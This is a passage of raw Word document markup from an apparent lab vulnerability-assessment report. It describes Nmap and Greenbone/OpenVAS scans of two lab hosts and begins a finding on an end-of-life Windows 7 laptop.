        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00361F35" w:rsidRPr="00122216">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00361F35" w:rsidRPr="00122216">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> live hosts list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CF8A36" w14:textId="77777777" w:rsidR="002F3798" w:rsidRPr="0094128D" w:rsidRDefault="002F3798" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0094128D">
        <w:t xml:space="preserve">Noted the IPs of </w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Victim-Laptop</w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application Server (192.168.57.30)</w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:t xml:space="preserve"> for deeper analysis. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090F6BA7" w14:textId="63DF04BC" w:rsidR="00E31294" w:rsidRPr="0094128D" w:rsidRDefault="002F3798" w:rsidP="002F3798">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094128D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2) Service and OS enumeration (Nmap)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79584C8E" w14:textId="7DC58BAA" w:rsidR="002F3798" w:rsidRPr="0094128D" w:rsidRDefault="002F3798" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0094128D">
        <w:t>Performed TCP port discovery and version detection on each host.</w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002544B1">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002544B1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094128D">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094128D">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094128D">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094128D">
        <w:t xml:space="preserve"> 192.168.57.</w:t>
      </w:r>
      <w:r w:rsidR="00964C83">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:t xml:space="preserve">0, </w:t>
      </w:r>
      <w:r w:rsidR="00964C83" w:rsidRPr="0094128D">
        <w:t>192.168.57.</w:t>
      </w:r>
      <w:r w:rsidR="00964C83">
        <w:t>30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618EB6C3" w14:textId="436B2E81" w:rsidR="00295127" w:rsidRDefault="002F3798" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0094128D">
        <w:t>Captured open ports and service banners to map likely attack surfaces (e.g., SMB, RDP on Windows; HTTP/SSH on the web host).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8713C4" w14:textId="77777777" w:rsidR="00E31294" w:rsidRDefault="009F2D46" w:rsidP="00295127">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="041F51C6" wp14:editId="6FFA015E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>332740</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1587196</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2035534" cy="190831"/>
                <wp:effectExtent l="57150" t="19050" r="79375" b="95250"/>
                <wp:wrapNone/>
                <wp:docPr id="1885116379" name="Rectangle 18"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2035534" cy="190831"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="127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DA04CB" id="Rectangle 18" o:spid="_x0000_s1026" style="position:absolute;margin-left:26.2pt;margin-top:125pt;width:160.3pt;height:15.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" filled="f" strokecolor="#e00" strokeweight="1pt">
                <v:shadow on="t" color="black" opacity="22937f" origin=",.5" offset="0,.63889mm"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00295127" w:rsidRPr="00295127">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C7F93D0" wp14:editId="7F4A81EA">
            <wp:extent cx="5943600" cy="4614545"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="133113527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35278" name="Picture 16"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614545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="002F3798" w:rsidRPr="0094128D">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7DCE5C" w14:textId="368EE8B2" w:rsidR="002F3798" w:rsidRPr="00E31294" w:rsidRDefault="00CF600F" w:rsidP="00295127">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C847E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Figure</w:t>
      </w:r>
      <w:r w:rsidR="00B5419C" w:rsidRPr="00C847E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5</w:t>
      </w:r>
      <w:r w:rsidR="002F3798" w:rsidRPr="00C847E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="002F3798" w:rsidRPr="00E31294">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA22EA" w:rsidRPr="00E31294">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap service/version output </w:t>
      </w:r>
      <w:r w:rsidRPr="00E31294">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>of Victim-Laptop 192.168.57.2</w:t>
      </w:r>
      <w:r w:rsidR="00EA22EA" w:rsidRPr="00E31294">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="002F3798" w:rsidRPr="0094128D">
        <w:br/>
      </w:r>
      <w:r w:rsidR="002F3798" w:rsidRPr="00E31294">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Nmap output was used to guide OpenVAS target setup and credential choices.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3462731E" w14:textId="77777777" w:rsidR="002F3798" w:rsidRPr="0094128D" w:rsidRDefault="002F3798" w:rsidP="002F3798">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094128D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3) Vulnerability scanning (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094128D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Greenbone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094128D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/OpenVAS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE71B9E" w14:textId="4367EC6A" w:rsidR="002F3798" w:rsidRPr="0094128D" w:rsidRDefault="002F3798" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0094128D">
        <w:t>Added targets (</w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Victim-Laptop</w:t>
      </w:r>
      <w:r w:rsidR="00BC04E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC04E9" w:rsidRPr="0094128D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>192.168.57.30</w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00BC04E9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC04E9" w:rsidRPr="00BC04E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application Server</w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>192.168.57.30</w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:t>) and launched scans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201B4E72" w14:textId="22AC08D4" w:rsidR="002F3798" w:rsidRPr="00321975" w:rsidRDefault="002F3798" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094128D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows credentialed scan</w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:t xml:space="preserve"> configured using lab credentials to enable local checks (e.g., missing patches, SMB configuration).</w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DA58B0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32977517" wp14:editId="4DD8919C">
            <wp:extent cx="5943600" cy="3819525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="174998488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4887" name="Picture 19"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r w:rsidR="00DA58B0" w:rsidRPr="00C847E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Figure</w:t>
      </w:r>
      <w:r w:rsidR="00321975" w:rsidRPr="00C847E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 6</w:t>
      </w:r>
      <w:r w:rsidRPr="00C847E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00321975">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00321975">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Greenbone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00321975">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> task run and results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529D4148" w14:textId="77777777" w:rsidR="002F3798" w:rsidRPr="0094128D" w:rsidRDefault="002F3798" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0094128D">
        <w:t xml:space="preserve">Ensured results include </w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>severity ratings (CVSS)</w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:t xml:space="preserve"> and host-specific findings with solution text. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DE4723" w14:textId="77777777" w:rsidR="002F3798" w:rsidRPr="0094128D" w:rsidRDefault="002F3798" w:rsidP="002F3798">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094128D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4) Prioritization and validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4320C320" w14:textId="152B3F58" w:rsidR="002F3798" w:rsidRPr="0094128D" w:rsidRDefault="000325CF" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Prioritized and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002F3798" w:rsidRPr="0094128D">
        <w:t>Validated</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002F3798" w:rsidRPr="0094128D">
        <w:t xml:space="preserve"> a subset of critical items by cross-checking Nmap banners, Windows role/services, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F3798" w:rsidRPr="0094128D">
        <w:t>Greenbone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002F3798" w:rsidRPr="0094128D">
        <w:t xml:space="preserve"> proof details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BEA5AF" w14:textId="77777777" w:rsidR="00B84D5E" w:rsidRDefault="00B84D5E" w:rsidP="00540DFA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="089DC5C8" w14:textId="77777777" w:rsidR="00B84D5E" w:rsidRDefault="00B84D5E" w:rsidP="00540DFA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ACC779C" w14:textId="77777777" w:rsidR="00B84D5E" w:rsidRDefault="00B84D5E" w:rsidP="00540DFA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AC66841" w14:textId="77777777" w:rsidR="00B84D5E" w:rsidRDefault="00B84D5E" w:rsidP="00540DFA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5089EDA5" w14:textId="77777777" w:rsidR="00B84D5E" w:rsidRDefault="00B84D5E" w:rsidP="00540DFA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7200A2A2" w14:textId="77777777" w:rsidR="00B84D5E" w:rsidRDefault="00B84D5E" w:rsidP="00540DFA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5471538B" w14:textId="77777777" w:rsidR="00B84D5E" w:rsidRDefault="00B84D5E" w:rsidP="00540DFA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34D6D3B9" w14:textId="1D6C07BB" w:rsidR="00540DFA" w:rsidRPr="00540DFA" w:rsidRDefault="00540DFA" w:rsidP="00540DFA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00540DFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Detailed findings and remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5864D46D" w14:textId="2EF4C426" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="00444C92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">1 - </w:t>
      </w:r>
      <w:r w:rsidR="00240A8D" w:rsidRPr="00240A8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Windows OS unsupported / End-of-Life</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a8"/>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444C92" w14:paraId="4F34AC47" w14:textId="77777777" w:rsidTr="008A21E0">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A61C00"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F363FA7" w14:textId="78951C89" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH RISK (</w:t>
            </w:r>
            <w:r w:rsidR="00EA7226">
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>/10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444C92" w14:paraId="58AF7E48" w14:textId="77777777" w:rsidTr="00D464D4">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="32C20BFE" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Exploitation Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6345" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D99594" w:themeFill="accent2" w:themeFillTint="99"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5952CDD6" w14:textId="70985433" w:rsidR="00444C92" w:rsidRDefault="00D464D4" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444C92" w14:paraId="663D100F" w14:textId="77777777" w:rsidTr="008A21E0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5F8C6D71" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">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tcPr>
          <w:p w14:paraId="294F675C" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Severe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444C92" w14:paraId="3CE35FC7" w14:textId="77777777" w:rsidTr="00D464D4">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4F9DEEE8" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remediation Difficulty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6345" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D99594" w:themeFill="accent2" w:themeFillTint="99"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="78E323DA" w14:textId="1F96E0CA" w:rsidR="00444C92" w:rsidRDefault="00D464D4" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Difficult</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79DE1940" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="00444C92"/>
    <w:p w14:paraId="17B542BF" w14:textId="0CBB357D" w:rsidR="4C137A0F" w:rsidRDefault="4C137A0F" w:rsidP="0AC6C903">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0AC6C903">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Synopsis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644D9662" w14:textId="77777777" w:rsidR="007A3581" w:rsidRDefault="007A3581" w:rsidP="009B74F0">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007A3581">
        <w:t xml:space="preserve">The Victim-Laptop is running Windows 7 Professional 7600, which is out of vendor support. No security </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A3581">
        <w:t>patches</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A3581">
        <w:t xml:space="preserve"> are available, leaving </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A3581">
        <w:t>it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A3581">
        <w:t xml:space="preserve"> exposed to all published and future vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024A701C" w14:textId="77777777" w:rsidR="007A3581" w:rsidRDefault="007A3581" w:rsidP="009B74F0">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7606A37D" w14:textId="1045E422" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="009B74F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C86CB1F" w14:textId="7BA7A051" w:rsidR="00E31294" w:rsidRDefault="00E7537A" w:rsidP="00E31294">
      <w:r w:rsidRPr="00E7537A">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
